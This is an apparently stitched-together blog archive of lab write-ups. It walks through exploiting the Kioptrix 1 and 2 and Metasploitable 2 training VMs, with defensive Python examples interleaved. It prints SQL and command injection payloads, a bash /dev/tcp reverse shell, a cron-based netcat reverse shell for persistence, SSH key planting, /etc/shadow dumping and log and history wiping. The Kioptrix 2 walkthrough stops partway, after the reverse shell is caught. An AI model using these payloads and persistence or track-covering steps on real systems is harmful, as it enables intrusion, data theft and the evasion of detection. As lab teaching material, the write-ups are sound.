Month: February 2017

Kioptrix: Level 1.1 (#2) is the second VM of the Kioptrix series, which can be found here. The Kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to the VMs in the PWK course for those who want to get the OSCP certification.

Description from the author: “This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.”

Let's get started!

Kali Linux machine

192.168.182.147

Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.152.

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning

Using nmap you can see the server is running OpenSSH 3.9p1 on port 22/tcp, Apache httpd 2.0.52 on port 80/tcp, Apache httpd 2.0.52 on port 443/tcp, CUPS 1.1 on port 631/tcp, and MySQL on port 3306/tcp. It's probable that this web server has a back-end SQL database, which might be vulnerable to SQL injection.

Exploitation (SQL and Command Injection)

Browsing to the server, I found that it displays a login page. Next, I will try to perform an SQL injection.

I tested the login form with the input ' or '1'='1 and it worked.

It probably worked because the SQL statement is along the lines of this:

SELECT * FROM users WHERE username='$username' AND password='$password'

Supplying ' or '1'='1 as both the username and the password turns the SQL statement into:

SELECT * FROM users WHERE username='' or '1'='1' AND password='' or '1'='1'

Because '1'='1' is always true, the WHERE clause matches every row, so this SELECT statement logs us in and returns the first user from the users table.
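To show why the statement above bypasses the login and how the same query looks when it is written correctly, here is an added example (not code from the Kioptrix VM or this post). It assumes a constructed in-memory SQLite users table standing in for the real back-end; the payload is the one tested above.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the login backend (assumption: one users table).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("john", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    # String interpolation: the input becomes part of the SQL grammar,
    # so ' or '1'='1 turns the WHERE clause into an always-true expression.
    sql = ("SELECT * FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None  # first matching username, or None


def login_safe(conn, username, password):
    # Bound parameters: the input is only ever compared as a string value.
    sql = "SELECT * FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo():
    conn = make_db()
    payload = "' or '1'='1"
    return (login_vulnerable(conn, payload, payload),  # logs in as the first user
            login_safe(conn, payload, payload),        # rejected
            login_safe(conn, "john", "hunter2"))       # real credentials still work


if __name__ == "__main__":
    print(demo())
```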

After logging in we are presented with a ping utility, which might be vulnerable to command injection. Using the input ; id I confirmed that the application was vulnerable, so I also tried to get the usernames and passwords from the server. I was able to read the /etc/passwd file but did not have access to /etc/shadow.

Knowing that the application is vulnerable to command injection, I took it a step further and tried to get a reverse shell. I used nc to set up the listener to catch it:

root@kali:~# nc -nvlp 443

Then I went back to the console on the website and ran the following command to get the reverse shell:

; bash -i >& /dev/tcp/192.168.182.147/443 0>&1

I successfully got a reverse shell as the apache user. Next I will try to escalate privileges to get the desired root account.
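The ping page is vulnerable because the target is pasted into a shell command line. As an added example (not the VM's code), the following shows that pattern next to a hardened version that allow-lists the target and never invokes a shell; the function names and the hostname regex are my own.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and inner hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def vulnerable_command(target):
    # The pattern described above: user input concatenated into a shell line.
    # A target of "127.0.0.1; id" makes the shell run ping and then id.
    return "ping -c 3 " + target


def is_safe_target(target):
    """Allow-list check: a literal IP address or a well-formed hostname, nothing else."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return HOSTNAME_RE.match(target) is not None


def build_ping_argv(target):
    """Return an argv list for ping; metacharacters in the input never reach a shell."""
    if not is_safe_target(target):
        raise ValueError("rejected target: %r" % (target,))
    return ["ping", "-c", "3", target]


def run_ping(target):
    # A list argv with the default shell=False means no shell parsing at all.
    return subprocess.run(build_ping_argv(target), capture_output=True,
                          text=True, timeout=15).stdout
```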

Kioptrix Level 1 is the first in a series of five. The point of the game is to get a root shell on the vulnerable machine. The Kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to the VMs in the PWK course for those who want to get the OSCP certification. More info from the author is listed below, with the link to download the VM here.

Description from the author: “This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.”

Without further ado, let's get started.

Kali Linux machine

192.168.182.147

Reconnaissance

Using the tool netdiscover, I found the victim at IP address 192.168.182.151.

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning and enumeration

I used nmap to scan the victim and found it was running OpenSSH 2.9p2 on port 22, Apache httpd 1.3.20 on ports 80 and 443, samba smbd on port 139, and rpcbind on port 111.

I did a simple SMB enumeration with the enum4linux tool and found that the victim is running Samba 2.2.1a, which is vulnerable to the Samba trans2open overflow. The exploit can be located here.

root@kali:~# enum4linux -a 192.168.182.151

Exploitation

Samba TRANS2_OPEN Buffer Overflow

A description of this vulnerability, taken from Rapid7's Vulnerability & Exploit Database, is listed below. I used the Metasploit module exploit/linux/samba/trans2open to exploit it.

Description: Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.

Conclusion

After getting a root shell I found the flag in /var/spool/mail, which said: “If you are reading this, you got root. Congratulations.
Level 2 won’t be as easy…”
Well, that's it for level 1. It will only get harder from here. Next is Level 2.

Metasploitable is a virtual machine that was intentionally built to be vulnerable so you can test out penetration-testing tools and practise common techniques on it. What I will do is go through the five phases of a penetration test (except reconnaissance) and talk about some of the tools and types of exploits I used. Granted, Metasploitable 2 has many other vulnerabilities, but I will only cover a few, which will give you a good start on exploiting Metasploitable 2. Below are the IP addresses of my Kali and Metasploitable virtual machines.

Kali Linux Machine

192.168.182.147

Metasploitable 2

192.168.182.150

Scanning and Enumeration

Scanning with nmap

Using nmap to do a version scan with OS detection shows the services and the version each one is running. According to nmap the OS is Linux 2.6.X as well.

Banner grabbing the web server

Using netcat I found that the victim is running Apache httpd 2.2.8 ((Ubuntu) DAV/2). By pointing my web browser at http://192.168.182.150 I also found services such as Damn Vulnerable Web App, Mutillidae, phpMyAdmin, a wiki, and WebDAV running on the victim machine, as well as the credentials username msfadmin and password msfadmin to log in.

VNC on port 5900

In the nmap scan I saw that the victim was running VNC (protocol 3.3). I tried connecting to it, but it requires a password to get in. I will brute-force my way in later in this pentest.

Exploitation

VSFTPD v2.3.4 Backdoor (Port 21)

According to nmap, Metasploitable is running VSFTPD v2.3.4. In 2011 a backdoor was introduced into the vsftpd-2.3.4.tar.gz archive; it was present between June 30th 2011 and July 1st 2011 and was removed on July 3rd 2011. We are going to check whether this server contains the backdoor. Enter any username you like and add “:)” at the end. You can use anything for the password. If the backdoor is there, it will trigger without valid credentials. The login will hang after the password, which tells us that the FTP server is still processing the login attempt. If we use Netcat to connect to port 6200 we get a root shell, which indicates the backdoor is present. You could also use the Metasploit Framework module for this exploit, located here.

Java RMI Server (exploit/multi/misc/java_rmi_server)

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

What I did was use Metasploit, load the module “exploit/multi/misc/java_rmi_server” and set the options up to run the exploit. What's a bit different here is that I set the payload to java/meterpreter/reverse_tcp before running the exploit.

NFS Share misconfiguration (Port 2049)

NFS (Network File System) is a Unix service used to share resources across the network; however, system administrators need to pay attention, because misconfiguring it can present a vulnerability like the one shown here. The nmap scan showed that NFS was running on port 2049. Using the command showmount -e 192.168.182.150, I discovered that the root directory was being shared! Naturally I was going to exploit the vulnerability listed below.

I created a mount point in order to view all the contents of the server. I also ran the df -h command to show that we have access to the root directory of the server. In the post-exploitation phase I will add an SSH key to the server's authorized_keys file; more on that later in this guide.
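The misconfiguration above lives in /etc/exports. As an added example (not part of the original post or of Metasploitable), here is a small auditor that parses an exports file and flags the conditions that made this share exploitable: the root filesystem exported, exported to any client, or exported with no_root_squash. The sample exports content is constructed, not copied from the VM.

```python
import re

# Constructed /etc/exports content (assumption; not the real Metasploitable file).
SAMPLE_EXPORTS = """\
# root filesystem shared with everyone, remote root not squashed: the worst case
/ *(rw,no_root_squash)
/srv/data 192.168.182.0/24(ro,root_squash,sync)
/home 192.168.182.147(rw)
"""

CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")  # host[(opt,opt,...)]


def parse_exports(text):
    """Yield (path, client, options) for every export entry, skipping comments."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        path, clients = parts[0], parts[1:]
        for client in clients:
            m = CLIENT_RE.match(client)
            host = m.group(1) or "*"          # a bare "(rw)" means any host
            opts = set(filter(None, (m.group(2) or "").split(",")))
            yield path, host, opts


def audit_exports(text):
    """Return a list of (path, client, reason) findings for risky exports."""
    findings = []
    for path, host, opts in parse_exports(text):
        if path == "/":
            findings.append((path, host, "root filesystem exported"))
        if host == "*":
            findings.append((path, host, "exported to any client"))
        if "no_root_squash" in opts:
            findings.append((path, host, "no_root_squash: remote root is local root"))
    return findings


if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print("%-12s %-20s %s" % finding)
```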

Bruteforcing Vncviewer Login Credentials (Port 5900)

Using Metasploit's auxiliary module “auxiliary/scanner/vnc/vnc_login”, I brute-forced the victim and obtained the password “password”. With this I ran vncviewer again with the correct credentials and got not only a GUI but also a root shell on the system!

UnrealIRCD 3.2.8.1 Backdoor Command Execution (Port 6667)

This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. The backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010. Let's use the Metasploit Framework with the exploit/unix/irc/unreal_ircd_3281_backdoor module to exploit it.

Post Exploitation

Getting the usernames and passwords from the Victim

Once you have a reverse shell, you can use the cat command to display the contents of the /etc/shadow file. This shows the password hash for each username. On closer inspection you can tell that these are MD5 (Unix) hashes.
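How to tell from a shadow entry which algorithm protects a password, and which accounts are worth flagging, as an added example (my own code, not from the post). The shadow lines are constructed with dummy hash bodies; the $1$ prefix is what marks the MD5 (Unix) hashes mentioned above.

```python
# crypt(3) identifiers found between the first two '$' of a shadow hash field.
HASH_IDS = {
    "1": "MD5 (md5crypt)",
    "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "SHA-256 (sha256crypt)",
    "6": "SHA-512 (sha512crypt)",
    "y": "yescrypt",
}
WEAK = {"MD5 (md5crypt)", "DES (traditional crypt)"}

# Constructed shadow lines (not the real Metasploitable file); hash bodies are dummies.
SAMPLE_SHADOW = """\
root:$1$abcdefgh$0123456789abcdefghijkl:17200:0:99999:7:::
msfadmin:$1$ijklmnop$ABCDEFGHIJKLMNOPQRSTUV:17200:0:99999:7:::
sshd:*:17200:0:99999:7:::
daemon:!:17200:0:99999:7:::
svc:$6$rounds=5000$saltsalt$QWERTYUIOPASDFGHJKLZXCVBNM:17200:0:99999:7:::
oldbox:AbCdEfGhIjKlM:17200:0:99999:7:::
"""


def classify_hash(field):
    """Return a human-readable algorithm name for one shadow password field."""
    if field == "":
        return "EMPTY (no password required)"
    if field.startswith(("!", "*")):
        return "locked / no login"
    if field.startswith("$"):
        ident = field.split("$")[1]
        return HASH_IDS.get(ident, "unknown crypt id $%s$" % ident)
    if len(field) == 13:
        return "DES (traditional crypt)"   # legacy 13-char crypt output
    return "unrecognised"


def audit_shadow(text):
    """Return {user: algorithm} for accounts whose hash is weak or empty."""
    weak = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        user, field = line.split(":")[:2]
        algo = classify_hash(field)
        if algo in WEAK or algo.startswith("EMPTY"):
            weak[user] = algo
    return weak
```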

Enable a Cron Job to run every 5 minutes

Using the line below we can set up a cron job that runs every 5 minutes and uses Netcat to return a root shell. Open /etc/crontab on the Linux victim, paste the line below at the end of the file, save and exit, then restart the cron service with service cron restart. Now all you have to do is set up a Netcat listener on your Kali machine to catch the shell.

*/5 * * * * root nc 192.168.182.147 12345 -e /bin/bash

This will set up the listener to catch the shell:

nc -lvp 12345
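From the defender's side, the persistence just added is a single extra line in /etc/crontab. As an added example (not from the post), here is a check that parses a system crontab and flags jobs whose command matches the reverse-shell patterns used on this page; the crontab content is constructed, with the one entry mirroring the line above.

```python
import re

# Constructed /etc/crontab content (assumption); the nc line mirrors the one added above.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root nc 192.168.182.147 12345 -e /bin/bash
0 3 * * * root /usr/bin/backup.sh
"""

# Command patterns that rarely belong in a scheduled job.
SUSPICIOUS = [
    (re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s"), "netcat with -e (shell bound to a socket)"),
    (re.compile(r"/dev/tcp/"), "bash /dev/tcp redirection"),
    (re.compile(r"\bbash\s+-i\b"), "interactive bash in a job"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "download piped into a shell"),
]


def parse_system_crontab(text):
    """Yield (schedule, user, command) for job lines; skip comments and VAR=value lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue
        fields = line.split(None, 6)   # 5 schedule fields, user, rest is the command
        if len(fields) < 7:
            continue
        yield " ".join(fields[:5]), fields[5], fields[6]


def find_suspicious_jobs(text):
    """Return [(user, command, reason)] for jobs matching a suspicious pattern."""
    hits = []
    for _schedule, user, command in parse_system_crontab(text):
        for pattern, reason in SUSPICIOUS:
            if pattern.search(command):
                hits.append((user, command, reason))
                break
    return hits
```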

Adding a SSH key on the Server for future use

Since we have access to the server's SSH keys, I will generate my own SSH key with ssh-keygen and append it to Metasploitable's authorized_keys file with the command below.

cat ~/.ssh/id_rsa.pub >> /temp/root_access2Metaploitable/root/.ssh/authorized_keys

We have now successfully authenticated to the server as root without needing a password, and I can come back anytime without password authentication.

root@kali:~# ssh root@192.168.182.150
Last login: Sat Feb 4 15:56:27 2017 from 192.168.182.147
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~#
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~# hostname
metasploitable
root@metasploitable:~#

Covering Tracks

Clear Event Logs

Using an editor such as kwrite, edit, or vi, open the file /var/log/messages. From there you can delete the entries related to your compromise of the system, or all of the entries if you like.

Clearing terminal history

You can clear your current session's bash history with the command history -c.

You can also remove the .bash_history file on the victim's machine to remove all of the history:

rm ~/.bash_history

Conclusion

Metasploitable provides common vulnerabilities in a VM on which we can test penetration techniques; however, this is just a start for those interested in learning a bit about penetration testing. Later on I will exploit other vulnerable VMs from Vulnhub and Pentester Labs.

Note: I will continue to add to this guide over time. If you have any comments, questions, or other topics you would want me to cover, let me know.